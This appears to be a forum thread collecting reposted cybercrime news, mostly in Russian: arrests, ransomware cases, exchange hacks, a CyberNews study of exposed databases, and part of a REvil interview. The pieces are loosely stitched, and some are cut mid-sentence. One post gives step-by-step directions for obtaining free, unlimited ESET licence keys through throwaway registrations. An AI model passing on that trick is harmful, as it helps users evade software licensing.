Народная CyberАрмия попала в поле зрения американских ведомств и специалистов по безопасности зимой/весной, когда подтвердились её заявления о взломах систем управления оборудованием на некрупных инфраструктурных объектах в США и Европе (вроде водяной мельницы во Франции или резервуара для воды в Техасе). В мае CISA выпустило бюллетень об атаках хактивистов на промышленные системы.
В пресс-релизе Казначейства дополнительно сообщается, что Народная CyberАрмия якобы смогла взломать SCADA-систему американской энергетической компании (в этом обвиняют конкретно Дегтяренко), получив доступ к сигнализации и к насосам.
Но несмотря на успешное получение доступа к промышленным системам, серьёзного ущерба удалось избежать в связи с тем, что у группировки не было продвинутых технических навыков, отмечают американцы.
home.treasury.gov/news/press-releases/jy2473
cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-
pro-russia-hacktivist-activity
В США приговорили 23х летнего кардера на 6 лет тюремного заключения за покупку дампов CC и использование их для покупки ювелирных изделий
Окружной судья США Сара Лиой приговорила 23-летнего Хасана Ховарда из Кливленда, штат Огайо, к более чем шести годам тюремного заключения по различным обвинениям в мошенничестве. Судья также обязала Ховарда выплатить 261 319 долларов компенсации.
Говард записывал дампы кредитных карт на белый пластик, после чего вместе с сообщниками покупали дорогие товары, включая ювелирные изделия и часы. В уголовной жалобе агент ФБР написал, что следователи узнали, что у Говарда был аккаунт в магазине «Joker's Stash».
В одном из примеров, предоставленных прокуратурой, Говард, Гутери и Латтимор купили часы Rolex за 19 062 доллара в ювелирном магазине в Вестлейке. В другом примере Говард использовал поддельную кредитную карту для покупки 4-ёх золотых браслетов с бриллиантами в ювелирном магазине в Кантоне на сумму $26 463. Суммарно Говард вместе с сообщниками причинил ущерб на сумму $261 319.
• Source: justice[.]gov/usao-ndoh/pr/cleveland-man-sentenced-more-six-years-
prison-leading-conspiracy-purchased-thousands
Стражи порядка накрыли обнал-сервис из Казани, заработавший ₽168 миллионов
__По
данным правоохранителей, группу обнальщиков создала жительница Казани, она же
придумала все схемы. Всего было задействовано 4 человека и, как минимум, 73
юридических лица и ИП, оформленных на дропов.
Фирма брала 12% за свои услуги и заработала более ₽168 миллионов
__Возбуждено
уголовное дело по ч. 2 ст. 172 УК РФ. Обнальщики готовятся уехать на 7 лет,
если стражи порядка больше ничего не найдут.
Полиция Испании арестовала гражданина Украины, на которого был выдан красный круглосуточный ордер Интерпола по запросу США. Он скрывался от американского правосудия более 10 лет, обвиняясь в создании и распространении вредоносного программного обеспечения, известного как scareware.
Арест произошел во вторник в аэропорту Барселоны-Эль-Прат, куда подозреваемый прилетел с целью посетить город. В операции принимали участие сотрудники Генеральной комиссарии по информации, провинциальных бригад по информации Тенерифе и Барселоны и комиссариата аэропорта Эль-Прат. На международном уровне операция была поддержана ФБР и Интерполом.
Scareware - это вид мошенничества, при котором злоумышленники заражают компьютеры жертв специальным кодом, который выводит на экран сообщения о том, что устройство заражено вирусом и необходимо приобрести антивирусное программное обеспечение для его устранения. Жертвы платят до 129 долларов за фальшивые программы безопасности, не подозревая, что отдают деньги тем, кто изначально заразил их компьютер.
По данным следствия, преступления задержанного затронули сотни тысяч жертв по всему миру и причинили потери потребителям на сумму более 70 миллионов долларов.
В среду утром он был доставлен в Центральный суд по следственным делам номер шесть Национальной аудитории, который вынес решение о его заключении под стражу.
• Source: https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=15824
Летом прошлого года американские власти предъявили обвинения бывшему сотруднику Microsoft, гражданину Украины Владимиру Квашуку, который похитил у компании около 10 000 000 долларов.
Некоторое время Квашук работал на Microsoft в качестве стороннего подрядчика, а затем в 2016 году попал в штат компании. Вплоть до 2018 года 25-летний программист занимался тестированием платформы розничных продаж Microsoft, и в какой-то момент решил злоупотребить имеющимся у него доступом.
Министерство юстиции США сообщает, что Квашук использовал собственные аккаунты, а также тестовые учетные записи, принадлежавшие другим сотрудникам (стремясь запутать следы и скрыть свою активность, подставляя коллег), чтобы похищать доступные ему предоплаченные средства в цифровой валюте, к примеру, деньги с подарочных карт .
Сначала Квашук похищал сравнительно небольшие суммы, не более 12 000 долларов за раз, а украденные данные затем перепродавал в интернете. Но в итоге такими «небольшими порциями» Квашук наворовал более 10 000 000 долларов, и смог купить себе дом на берегу озера за 1 600 000 долларов и автомобиль Tesla за 160 000 долларов.
Также, стремясь скрыть следы своих преступлений, Квашук использовал миксер- сервисы для отмывания криптовалюты, поступавшей на его банковский и инвестиционный счета. Так, в течение семи месяцев на его счета поступило около 2 800 000 долларов в биткоинах, и эти суммы были внесены в его налоговые декларации под видом подарков от родственника.
Правоохранители пишут, что воровство обнаружили в 2018 году, после чего Квашук был уволен, а затем арестован. В суде он отрицал тот факт, что обманывал своего работодателя (то есть Microsoft) и пытался подставить коллег. Вместо этого он заявлял, что «работал над специальным проектом в интересах компании».
Отрицание очевидного не помогло, и на этой неделе суд вынес приговор по этому делу. Квашука приговорили к 9 годам лишения свободы по множеству обвинений, включая мошенничество с использованием электронных средств, отмывание денег, кражу личных данных при отягчающих обстоятельствах, подачу поддельных налоговых деклараций. Также его обязали выплатить 8 300 000 долларов в качестве возмещения ущерба.
«Схема Квашука целиком состояла из лжи и обмана. Он поставил под удар своих коллег, используя их тестовые учетные записи для хищений. Вместо того чтобы взять на себя ответственность [за содеянное], он дал показания, состоявшие из возмутительной лжи. Квашук не выказывает никаких признаков того, что он испытывает угрызения совести или сожалеет о своих преступлениях», — заявляют представители американской прокуратуры.
Click to expand...
Источник: xakep.ru/2020/11/10/kvashuk-sentenced/
Индонезийская криптовалютная биржа Indodax подверглась хакерской атаке, в ходе которой потеряла криптоактивы на общую сумму около $15,7 млн.
Крупные оттоки криптовалют с Indodax обнаружили аналитики PeckShield. По их данным, хакер переместил на адрес Эфириума 5 204 ETH, а также 6,8 млн POL в сеть Polygon и 380 ETH в Optimism.
__https://twitter.com/x/status/1833686247619055806
Специалисты по безопасности блокчейнов из Cyvers Alerts тоже выявили несколько подозрительных транзакций с участием кошельков Indodax в разных сетях. По их данным, на подозрительном адресе находятся криптоактивы на $14,4 млн, и они уже обмениваются на эфиры.
__https://twitter.com/x/status/1833629057256239175
Руководство Indodax подтвердило проблемы с безопасностью. Биржа ушла на техническое обслуживание, а ее веб-сайт и приложение временно недоступны. Indodax заверила, что средства клиентов, как в криптовалютах, так и в индийских рупиях, находятся в безопасности. Команда биржи пообещала предоставить более подробную информацию об инциденте после завершения расследования.
В 2020 году немецкий трейдер обвинил криптобиржу Indodax в косвенном содействии мошенничеству. Истец утверждал, будто биржа не соблюдала процедуры идентификации личности (KYC) и правила борьбы с отмыванием денег (AML).
На момент проведения обыска "под контролем" фигуранта находилось почти 600 зараженных компьютеров, к которым он мог присоединиться в реальном времени.
В Хмельницкой области полиция разоблачила 25-летнего программиста, который создал "вирус" для похищения данных пользователей.
Сообщается, что вредоносное ПО мужчина распространял под видом приложений к компьютерным играм и получил удаленный доступ к более чем 10 тысячам компьютеров.
"Попав на устройства пользователей, приложение давало возможность загружать и отгружать файлы, устанавливать и удалять приложения, делать скриншоты с удаленного экрана, перехватывать звук с микрофона и видео со встроенных или внешних камер. Собрав определенные данные, злоумышленник обрабатывал их для последующего похищения аккаунтов или вывода электронных средств, содержащихся на балансе таких аккаунтов", - сообщают в полиции.
Сообщается, что на момент проведения обыска "под контролем" фигуранта находилось почти 600 зараженных компьютеров, к которым он мог присоединиться в реальном времени.
Открыто уголовное производство о несанкционированном вмешательстве в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей). Санкция соответствующей статьи предусматривает от десяти до пятнадцати лет лишения свободы.
source: cyberpolice.gov.ua/news/kiberpolicziya-vykryla-zhytelya-xmelnychchyny- u-stvorenni-virusu-dlya-vykradennya-danyx-korystuvachiv-7546
13 декабря 2024 года, Токио — Японский издатель Kadokawa Corp. оказался жертвой масштабной кибератаки в июне этого года, после которой компания, по данным источников, была вынуждена перевести хакерской группировке $2,98 миллиона в криптовалюте.
Согласно расследованию, проведённому компанией по кибербезопасности Unknown Technologies Inc. по заказу новостного агентства Kyodo News , в июне 2023 года была зафиксирована транзакция на сумму около $2,98 миллиона (эквивалентная 44 биткоинам), отправленная на криптовалютный счёт, связанный с группировкой BlackSuit. Эта группа, якобы связанная с Россией, заявила о похищении и шифровании данных объёмом 1,5 терабайта , включая личную и финансовую информацию сотрудников дочерней компании Dwango Co. , которая управляет видеосервисом niconico.
Атака произошла 8 июня , когда серверы Kadokawa в центре обработки данных подверглись мощному кибератаке с использованием программ-вымогателей. В ходе атаки пострадали основные сервисы компании, включая популярный видеосервис niconico. Впоследствии, Kadokawa подтвердила утечку личной информации всех сотрудников Dwango.
В ходе переговоров 13 июня главный операционный директор Dwango , Сигэтака Курита , получил требование выплатить выкуп в размере $8,25 миллиона. Курита ответил, что из-за строгих мер комплаенса, связанных с прошлым коррупционным скандалом на Олимпийских играх в Токио, компания может предложить максимум $3 миллиона. Хакеры снизили требование до $2,98 миллиона , угрожая удалением украденных данных в течение 48 часов. По данным Unknown Technologies , перевод был успешно осуществлён в указанный срок.
Однако, несмотря на выплату, хакеры продолжили распространять украденные данные, что вызывает серьёзные вопросы о целесообразности и этичности выплаты выкупов. Представители Kadokawa отказались комментировать факт перевода средств, ссылаясь на продолжающиеся полицейские расследования. Группировка BlackSuit ранее утверждала, что не получила никаких платежей и не ответила на последующие запросы интервью.
Источник из Kadokawa предположил, что хакеры пытались оказать давление на высшее руководство компании, информируя их о ходе переговоров в случае затягивания. "Переговоры не должны вестись так бездумно, так как существует множество хакеров, которые не выполняют свои обещания, " — прокомментировал представитель компании по безопасности.
Этот инцидент поднимает важные вопросы о подходах компаний к защите данных и реагированию на кибератаки. Специалисты по безопасности подчёркивают необходимость наличия чётких протоколов реагирования на инциденты и осторожности при переговорах с киберпреступниками, поскольку нет гарантии, что выплата выкупа приведёт к восстановлению данных или прекращению вредоносных действий.
Kadokawa продолжает сотрудничество с правоохранительными органами для расследования атаки и оценки масштабов утечки данных. Инцидент также стимулирует дискуссии о необходимости усиления законодательных мер по противодействию киберпреступности и регулированию использования криптовалют в подобных операциях.
рассмотрим способ получения бесплатных и бесконечных ключей для программ от разработчика ESET, все действия займут у Вас не более пары минут.
Приступим к получению:
Первым делом нам необходимо перейти на этот
сайт и пройти простой процесс
регистрации, можно использовать временную почту, вместо имени и фамилии -
любые символы
В течении минуты на Вашу почту придет письмо с данными для авторизации
После того, как Вы попадете в свой аккаунт, нажимаем на "Лицензии", она
находится в верхнем меню
Выбираем необходимую Вам версию из выпадающего списка и кликаем на кнопку
"Сгенерировать"
Пролистываем страницу ниже и видим полученную лицензию с необходимыми данными,
их вводим в антивирус
who has this book please
black hat graphql
worldwide that are still publicly accessible, leaving close to 19,000 terabytes of data exposed to anyone, including threat actors.
Most organizations use databases to store sensitive information. This includes passwords, usernames, document scans, health records, bank account and credit card details, as well as other essential data, all easily searchable and conveniently stored in one place.
Unsurprisingly, this makes databases a prime target for malicious actors who are eager to exploit unprotected systems and get their hands on profitable information. In fact, attackers often don’t even need to hack them to steal all that precious data: one of the most common causes of a breach are databases that have been simply left unsecured, allowing anyone to access the data without providing a username or password.
Such lapses in database security can (and often do) lead to [hundreds of millions of people](https://cybernews.com/security/report-unidentified- database-exposes-200-million-americans/) having their personal information exposed on the internet, allowing threat actors to use that data for a variety of malicious purposes, including [phishing](https://cybernews.com/security/how-phishing-attacks-are-evolving- and-why-you-should-care/) and other types of social engineering attacks, as well as [identity theft](https://cybernews.com/privacy/how-to-prevent-identity-theft- online/).
While there’s been a noticeable decline in data leaks from open databases in the last year, many database managers are still struggling to keep their data protected from unauthorized access.
But just how many unsecured databases are still out there? That’s what we at CyberNews wanted to find out.
What we discovered was eye-opening: tens of thousands of database servers are still left out in the open for anyone to access, with more than 29,000 instances of unprotected databases leaving nearly 19 petabytes of data exposed to theft, tampering, deletion, and worse.
The fact that thousands of open databases are exposing data is not new. Indeed, cybercriminals are so well-aware of this that it can take [mere hours](https://www.comparitech.com/blog/information-security/unsecured- database-honeypot/) for an unprotected database to be detected and attacked by threat actors.
One would suppose that after years of [massive leaks](https://cybernews.com/security/marketing-giant-maropost- exposes-95-million-emails-and-doesnt-seem-to-care-about-it/), [ransom demands](https://www.darkreading.com/cloud/22900-mongodb-databases-affected- in-ransomware-attack/d/d-id/1338271), and even devastating data wipeouts by feline hackers ([meow](https://blog.qualys.com/product-tech/2020/08/26/meow- attack-a-reminder-for-organizations-to-identify-and-secure-their-databases)) making the headlines, database owners would now be aware of the problem enough to, at the very least, ask for a username and password before letting anyone in.
Unfortunately, as our investigation shows, this does not seem to be the case.
To conduct this investigation, we used a specialized search engine to scan for open databases of three of the most popular database types: Hadoop, MongoDB, and Elasticsearch.
While performing the search, we made sure that the open databases we found required no authentication whatsoever and were open for anyone to access, as opposed to those that had default credentials enabled. We excluded the latter because it would require us to log in to those databases without authorization, which would be unethical. As a result, the actual number of unprotected databases and the amount of exposed data is likely even higher than what we were able to find.
With the initial search completed, we then ran a custom script to measure the size of each unprotected database, without gaining access to the data stored within.
Here’s what we found.

Our findings show that at least 29,219 unprotected Elasticsearch, Hadoop, and
MongoDB databases are left out in the open.
Hadoop clusters dwarf the competition in terms of exposed data with nearly 19 petabytes easily accessible to threat actors who can potentially endanger millions, if not [billions of users](https://nordpass.com/blog/exposed- databases-found/) with a click of a button.
When it comes to the number of exposed databases, Elasticsearch leads the pack with 19,814 instances without any kind of authentication in place, putting more than 14 terabytes of data at risk of being stolen or taken hostage by [ransomware gangs](https://cybernews.com/security/these-ransomware-cartels- will-leak-your-data-until-you-pay/).
MongoDB seems to fare much better than others terabyte-wise, but the 8,946 unprotected instances show that there’s still a long way to go in terms of basic database security for thousands of organizations and individuals who use MongoDB to store and manage their data.
As we can see, China tops the list with 12,943 exposed instances overall,
beating the other countries in each category by a large margin.
The United States comes second, with over 4,512 databases left out in the open, while Germany, where we found 1,479 unprotected instances, takes the third place.
India and France close the top five, with 1,018 and 746 publicly accessible databases, respectively.
Back in 2020, unknown cybercriminals launched a series of so-called ‘Meow’ attacks that wiped all the data stored on [thousands of unsecured databases](https://www.welivesecurity.com/2020/07/27/almost-4000-databases- wiped-meow-attacks/) – without any explanation or even a ransom demand – leaving shocked owners with only an empty folder with files named ‘meow’ as the signature of the attacker.
Interestingly enough, we found that 59 databases hit by the ‘Meow’ attacks a
year ago are still unprotected and collectively leaving 12.5GB of data
exposed.
According to CyberNews security researcher Mantas Sasnauskas, this only goes to show that raising awareness about exposed and publicly accessible databases is as important as ever.
“Anyone can look for these unprotected clusters by using IoT search engines to effortlessly identify those that don’t have authentication enabled and exploit them by stealing the data, holding them ransom, or, as was the case with the ‘Meow’ attack, simply destroy valuable information for fun, wiping billions of records and crippling both business and personal projects in the process,” says Sasnauskas.
Organizations of all shapes and sizes use databases to store customer and employee records, financial data, and other kinds of sensitive information. Unfortunately, databases are often managed by administrators with no security training, which makes them an easy target for threat actors.
If you’re a database owner, here are a few simple steps you can take to secure your database against unwelcome guests:
For detailed step-by-step instructions on how to secure your particular type of database, see the official security guides for [Elasticsearch](https://www.elastic.co/blog/how-to-prevent-elasticsearch- server-breach-securing-elasticsearch#secure-elasticsearch), MongoDB, and [Hadoop](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop- common/SecureMode.html) databases.
With authentication enabled, make sure your database is protected by a unique and complex password that a potential intruder wouldn’t be able to guess.
Can’t come up with a strong password? Consider using a password manager to generate and securely store strong passwords, or use our free strong password generator to automatically generate one.
Еврокомиссия выступила с рядом законодательных инициатив, одна из которых предполагает запрет на использование на территории Евросоюза анонимных электронных кошельков для осуществления трансакций с криптовалютами. Об этом говорится в сообщении, опубликованном во вторник на сайте ЕК, передает ТАСС.
«Анонимные кошельки для криптоактивов будут запрещены в полном соответствии с правилами... ЕС в области криптовалют», — указано в тексте.
Отмечается, что поправки обеспечат полную прозрачность оборота криптоактивов и позволят предотвращать и обнаруживать их возможное использование при отмывании денег или финансировании терроризма.
В пресс-релизе уточняется, что на данный момент существующие в Евросоюзе правила регулируют деятельность лишь некоторых категорий поставщиков платежных услуг. Предложенные изменения в законодательство расширят действие правил на весь криптосектор, обязывая поставщиков услуг проводить комплексную проверку своих клиентов.
ЕК также предложила сформировать орган для борьбы с отмыванием денег в Евросоюзе.
«Европейская комиссия сегодня представила пакет законодательных инициатив с целью укрепления правил ЕС, касающихся борьбы с отмыванием денег и финансированием терроризма. Пакет включает предложение создать новый орган ЕС по борьбе с отмыванием средств», — говорится в заявлении.
Новое Управление по борьбе с отмыванием денег в ЕС (Anti-Money Laundering Authority, AMLA) должно будет «координировать власти стран для обеспечения корректного и последовательного соблюдения правил ЕС» в этой сфере, а также помогать органам финансовой разведки. AMLA будет следить за деятельностью «наиболее сомнительных финансовых учреждений» в странах Евросоюза и обеспечивать координацию между органами финансовой разведки в разных государствах, чтобы «более эффективно выявлять международные нелегальные финансовые потоки». Кроме того, в учреждении будет создана единая система надзора за отмыванием денег и финансированием терроризма на территории блока.
Еврокомиссия предложила запретить платежи наличными на суммы больше 10 тыс. евро
В Евросоюзе могут ввести единый для всех входящих в него стран запрет платежей наличными на сумму более 10 тыс. евро. С соответствующим предложением выступила Европейская комиссия, подготовившая новый пакет инициатив, призванных ужесточить борьбу с отмыванием денег и финансированием терроризма, сообщает РБК.
«Отмывание денег представляет собой явную и реальную угрозу для граждан, демократических институтов и финансовой системы. Масштабы проблемы нельзя недооценивать, необходимо закрыть лазейки, которыми могут воспользоваться преступники», — заявила еврокомиссар по финансовой стабильности и финансовым услугам Мейрид МакГиннесс.
В ЕК пояснили, что в ряде стран ЕС уже действуют нормы, запрещающие крупные платежи наличными. При этом лимиты для таких операций в разных государствах различаются: если в Греции предельная сумма составляет лишь 500 евро, то в Чехии она достигает 270 тыс. крон (10,5 тыс. евро). В связи с этим Еврокомиссия предложила сделать запрет платежей наличными на сумму более 10 тыс. евро общим для всех стран ЕС, предоставив в то же время властям отдельных стран возможность устанавливать лимит для таких операций ниже этой отметки по своему усмотрению.
Суд Сингапура предъявил официальные обвинения в мошенничестве членам группировки, разработавшей крупную вредоносную кампанию, направленной против жителей страны. Местные СМИ сообщают что на скамье подсудимых оказались два гражданина Малайзии в возрасте 26 и 47 лет.
Кампания началась в июне 2023 года. Киберпреступники обманом вынуждали своих жертв загружать на свои устройства вредоносное приложение, после чего перехватывали над ними контроль и получали доступ к банковскому ПО. В Сингапуре было зарегистрировано по меньшей мере 1899 случаев, а общая сумма украденного составила не менее 34,1 миллиона сингапурских долларов (примерно 2,24 миллиарда рублей).
Уже к ноябрю 2023 года местные силовики сформировали следственную группу, которой спустя несколько месяцев удалось выйти на след подозреваемых, обнаруженных в Малайзии, где они и были арестованы 12 июня 2024 года. Спустя два дня оба киберпреступника были экстрадированы в Сингапур. Спецслужбам также удалось отключить 52 сервера, связанных с распространением ПО и арестовать 14 дропов в Гонконге.
Отмечается, что еще четверо членов группировки были арестованы на Тайване. У них изъяли криптовалюту и недвижимость на общую сумму 1,33 миллиона долларов США.
sc: police.gov.sg/media- room/news/20240614_two_men_extradited_from_malaysia_to_be_charged_for_offences_in_relation_to_malware_scams
Киберпреступники распространяют вредоносные программы Zbot и DarkGate, устраивая «бомбардировку» электронных почт жертв с целью последующего контакта с ними с использованием социальной инженерии.
По [данным исследователей из Rapid7](https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware- campaign-drops-zbot-darkgate-and-custom-malware/), ключевой этап атаки начинается с создания процесса перегрузки почтового ящика жертвы, что достигается регистрацией её электронной почты на множестве сервисов для рассылок. Затем злоумышленники обращаются к пострадавшим, представляясь сотрудниками технической поддержки. Жертвам предлагается установить легитимное ПО удалённого доступа, такое как AnyDesk, TeamViewer или Microsoft Quick Assist, чтобы злоумышленники могли получить контроль над устройствами. «Сотрудник поддержки уже готов решить вашу проблему, только дайте ему необходимый доступ», — говорят хакеры.
После установки ПО удалённого доступа злоумышленники внедряют программы для кражи учётных данных и запуска вредоносных нагрузок, включая Zbot или DarkGate. Цель — получить доступ к VPN-компонентам организации и обойти многофакторную аутентификацию, чтобы напрямую проникнуть в сеть компании.
Используя вредоносное программное обеспечение, хакеры криптовали данные и требовали выкуп за восстановление доступа. От противоправных действий пострадали более 50 компаний в странах Европы и Америки. Убытки достигают более миллиона долларов США.
Деятельность хакерской группы разоблачили сотрудники Департамента киберполиции совместно с Главным следственным управлением Нацполиции, работниками СБУ и в сотрудничестве с коллегами-правоохранителями из Великобритании и США.
Организатор группы 36-летний киевлянин совместно с женой и тремя знакомыми совершал кибератаки на иностранные компании.
Используя вредоносное программное обеспечение типа Ransomware, фигуранты криптовали данные пострадавших. Вирус-вымогатель попадал на технику путем спам-рассылок на электронные ящики. Выкуп за восстановление доступа к данным получали трое исполнителей на собственные криптокошельки.
По предварительным данным, от атак пострадали более 50 компаний, общая сумма ущерба достигает более миллиона долларов США.
Кроме этого, по заказу иностранных хакеров фигуранты предоставляли услуги по подмене IP-адресов пользователей. Как следствие - последние имели возможность скрыто осуществлять противоправную деятельность.
Также установлено, что один из фигурантов разыскивался правоохранительными органами других государств. Так правонарушитель с помощью «вируса» получал данные банковских карт клиентов британских банков. За счет пострадавших злоумышленник покупал различные товары в интернет-магазинах и впоследствии перепродавал их.
Сотрудники полиции совместно с правоохранителями Великобритании и Соединенных Штатов Америки провели 9 обысков в домах фигурантов и в их автомобилях. Изъяты компьютерная техника, мобильные телефоны, банковские карты, флеш-накопители и три автомобиля.
К проведению обысков также были привлечены работники подразделения ТОР Департамента патрульной полиции.
Открыто уголовное производство по ч. 2 ст. 361 (Несанкционированное вмешательство в работу компьютеров, автоматизированных систем, компьютерных сетей или сетей электросвязи), ч. 2 ст. 361-1 (Создание с целью использования, распространения или сбыта вредоносных программных или технических средств, а также их распространения или сбыт), в. 209 (Легализация (отмывание) имущества, полученного преступным путем) Уголовного кодекса Украины.
Следственные действия продолжаются.
• Source: [https://www.npu.gov.ua/news/kiberzl...ax-inozemnix-kompanij- virusom- shifruvalnikom/](https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya- vikrila-xakerske-ugrupovannya-na-atakax-inozemnix-kompanij-virusom- shifruvalnikom/)
Кардер RTK_SXM стал фигурантом уголовного дела из-за предательства его партнера по старому делу. Теперь он пытается собрать с помощью коллег и единомышленников два миллиона рублей, которые позволят «решить вопрос в юридическом плане». Сообщение об этом появилось в нескольких закрытых чатах как от имени самого RTK_SXM, так и от имен его соратников.
Раскрывая детали сложившейся ситуации, кардер отметил, что был принят сотрудниками ФСБ при прохождении российской границы. Один из них подключил к его смартфону «маленькое черное устройство», на котором выбрал тип телефона и прошивку, после чего оперативно подобрал четырехзначный код для разблокировки устройства, который оказался еще и облачным паролем для аккаунта RTK_SXM в Telegram. Говоря о причинах своего задержания, он отметил, что «Путин поручил заниматься теми, кто делает Пушкинские карты и работает по ним».
«А проблема в том, что я заработал на этом 35 тысяч рублей, что самое смешное. Просто перепродал ИП, поскольку моему знакомому были нужны деньги, он спросил, насколько опасная эта тема, на что я ответил, что опасная, став тем самым фигурантом уголовного дела. А он это голосовое сохранил в заметках, показал на меня, сказал им мое имя», — посетовал RTK_SXM.
Click to expand...
К моменту написания этого поста ему удалось собрать лишь 200 долларов из необходимой суммы. При этом в частных беседах он не исключает, что в случае неудачи подпишет контракт с российской армией и отправится на территорию проведения специальной военной операции, где постарается отсидеться в тылу.
В мире кибербезопасности разгорелся необычный скандал: хакерская группировка
«Mogilevich » заявила, что не занимается распространением вирусов-
вымогателей.
В реальности, по их словам, они — асы мошенничества, строящие свои схемы на
обмане и хитрости.
Раскрытие истинных мотивов группы произошло весьма неожиданно, вскоре после
того, как «хакеры» заявили о похищении 189 ГБ конфиденциальных данных у
известного разработчика видеоигр Epic Games, которое компания быстро
опровергла .
Представитель группы, именующий себя Pongo, прокомментировал этот поворот
событий, утверждая, что вся деятельность группы «Mogilevich» — не более чем
хорошо спланированная афера.
«Мы использовали громкие имена, чтобы как можно быстрее заполучить
известность», — заявил Pongo. По его словам, всё было сделано для того,
чтобы быстро завоевать доверие среди других киберпреступников, а затем
надурить их, продав им фейковый RaaS-инструментарий и несуществующие данные
«взломанных» организаций.
Так, группировка убедила покупателя перевести им 85 тысяч долларов за базу
данных объёмом в один терабайт, якобы украденной у производителя дронов DJI,
хотя на деле никаких данных у преступников не было, ведь они никого не
взламывали.
По словам Pongo, целью «Mogilevich» было не только показать своё умение
обманывать, но и подчеркнуть, что они себя считают «гениальными
преступниками», а не просто хакерами. Такое заявление ставит под сомнение даже
сам факт их «признания», ведь кто может гарантировать, что и это не очередная
афера?
Событие вызвало бурную реакцию в среде кибербезопасности. Многие специалисты и
аналитики, ранее писавшие о деятельности «Mogilevich», оказались в
замешательстве, ведь теперь они столкнулись с необходимостью переосмыслить
своё восприятие группировки.
Сделали ли хакеры «Mogilevich» что-то хорошее, заставив других
киберпреступников потратить свои кровные на откровенную фикцию, или и сами они
ничем не лучше рядовых кибербандитов? Вопрос скорее риторический.
История с «Mogilevich» становится напоминанием о том, что в мире
киберпреступлений не всё так однозначно, как может показаться на первый
взгляд. Всегда важно сохранять бдительность и критически относиться к любой
информации, даже если она получена из авторитетного источника и кажется
абсолютно достоверной.
Переигратели:
threads/35828/post-758871
Источник: securitylab
Российский хакер, осужденный за главную роль в одной из крупнейших краж данных в истории США, был освобожден из тюрьмы после отбытия большей части своего 12-летнего срока.
Владимир Дринкман был освобожден из пенсильванской тюрьмы 28 октября, сообщили Азаттыку в Бюро тюрем США.
Адвокат Дринкмана Игорь Литвак от комментариев отказался. Радио Свобода не смогла сразу связаться с Дринкманом.
[Сорс](https://www.rferl.org/a/russian-hacker-data-breach-released-us- prison/32111024.html)
Как там настроение у Смилянца-отца, Смилянца-сына и Смилянца-духа?
23-летний житель из Солигорска может сесть в тюрьму из-за кражи скинов в CS:GO. Об этом сообщило УВД Миноблисполкома в группе в VK.
По словам представителей правоохранительного органа, 23-летний житель получил доступ к аккаунту приятеля и похитил его скины из CS:GO. После кражи гражданин из Беларуси продал косметические предметы. Когда к похитителю пришли оперативники, то он заявил, что сам стал жертвой взлома аккаунта. Однако его легенда оказалась ложью.
За несанкционированный доступ к компьютерной информации житель из Солигорска может лишиться свободы на срок до двух лет. Стоимость украденных скинов варьируется от $10 до $100.
Трудности с топливом могут возникнуть в штатах, где живут около 50 млн человек
Атаке вымогателей подверглась Colonial Pipeline Co. , которая производит половину бензина и дизельного топлива восточного побережья США.
Компания Colonial Pipiline 7 мая узнала, что стала жертвой кибератаки. В ответ на это мы превентивно отключили некоторые системы, чтобы сдержать угрозу, которая на время остановила все операции, связанные с трубопроводом, и затронула некоторые наши информационные системы", — говорится в заявлении компании.
Colonial заявила, что привлекла стороннюю фирму по кибербезопасности для начала расследования "характера и масштабов этого инцидента", а также связалась с правоохранительными органами и другими федеральными агентствами.
Colonial Pipeline обеспечивает 45% общего объема поставок топлива в штаты на Восточном побережье США. Ежедневно по обслуживаемым ею трубопроводам перекачивается более 454 млн л топлива.
После выхода заявления о кибератаке стоимость фьючерсов топлива на Нью- Йоркской товарной бирже выросла. К 12:00 по времени Восточного побережья (19:00 мск) цена поставок бензина в июне выросла на 0,85% - до $2,1317 за галлон (3,785 л), дизельного топлива - на 1,06%, до $2,0106 за галлон.
Editor’s Note: It’s undeniable that ransomware is the big moneymaker in cybercrime right now. And some groups looking to make a fortune are aggressively pushing the boundaries by raising their demands to seven or eight-figure sums, threatening to release data online if payments aren’t made, and targeting hospitals and other vulnerable organizations.
One group that has gained prominence for its audacious and lucrative tactics is REvil, also known as Sodinokibi. The group runs a ransomware-as-a-service operation, in which developers sell malware to affiliates who use it to lock up an organization’s data and devices.
In addition to publishing victim data online when companies don’t pay demands, REvil has attracted attention for trying to [extort](https://www.forbes.com/sites/daveywinder/2020/05/15/hackers-claim-to- have-trumps-dirty-laundry-and-demand-42-million-to-keep- quiet/?sh=144810537d1b) then-President Donald Trump and claiming to bring in $100 million in revenue from their operations. And according to an REvil representative that uses the alias “Unknown,” the group has big plans for 2021.
Some of Unknown’s claims, like affiliates with access to ballistic missile launch systems and nuclear power plants, seem outlandish—until you read [reports](https://www.politico.com/news/2020/12/17/nuclear-agency-hacked- officials-inform-congress-447855) that make them seem eerily [plausible](https://www.nytimes.com/2020/10/23/us/politics/energetic-bear- russian-hackers.html). The Record is not able to verify the assertions. Unknown talked to Recorded Future expert threat intelligence analyst Dmitry Smilyanets recently about using ransomware as a weapon, staying out of politics, experimenting with new tactics, and much more. The interview was conducted in Russian and translated to English with the help of a professional translator, and has been edited for clarity.
**Dmitry Smilyanets: Unknown, how did you decide to get into the business of ransomware?
Unknown:** Speaking personally, it was a long time ago. Since 2007, when there were winlockers and SMS. Even then, it brought a good profit.
**DS: You had a $1 million deposit on a hacking forum and mentioned $100 million in revenue—considering you get payments in cryptocurrency, then today you probably have half a billion dollars. How much is enough to make you quit ransomware?
UNK:** You counted everything correctly. The deposit was withdrawn precisely because of the exchange rate. For me personally, there is no ceiling amount. I just love doing it and making a profit from it. There is never too much money—but there’s always the risk of not enough money. Although, if we talk about advertisers, one felt that $50 million U.S. was enough and he retired. However, after four months he returned—turned out that wasn’t enough money. Think about it.
For me personally, there is no ceiling amount. I just love doing it and making a profit from it. There is never too much money—but there’s always the risk of not enough money.”
Click to expand...
**DS: You previously said that you remain apolitical, and are purely financially motivated. But if you do decide that you’ve made enough money, could your point of view change and you decide to impact geopolitics?
UNK:** I don’t really want to be a bargaining chip. We brushed up against politics and nothing good came of it—only losses. With the current geopolitical relationships, everything is very beneficial for us even without any interference.
**DS: What makes REvil so special? The code? Affiliates? Media attention?
UNK:** I think it’s all of that working together. For example, this interview.
It seems like, why would we even need it? On the other hand, better we give it
than our competitors. Unusual ideas, new methods, and brand reputation all
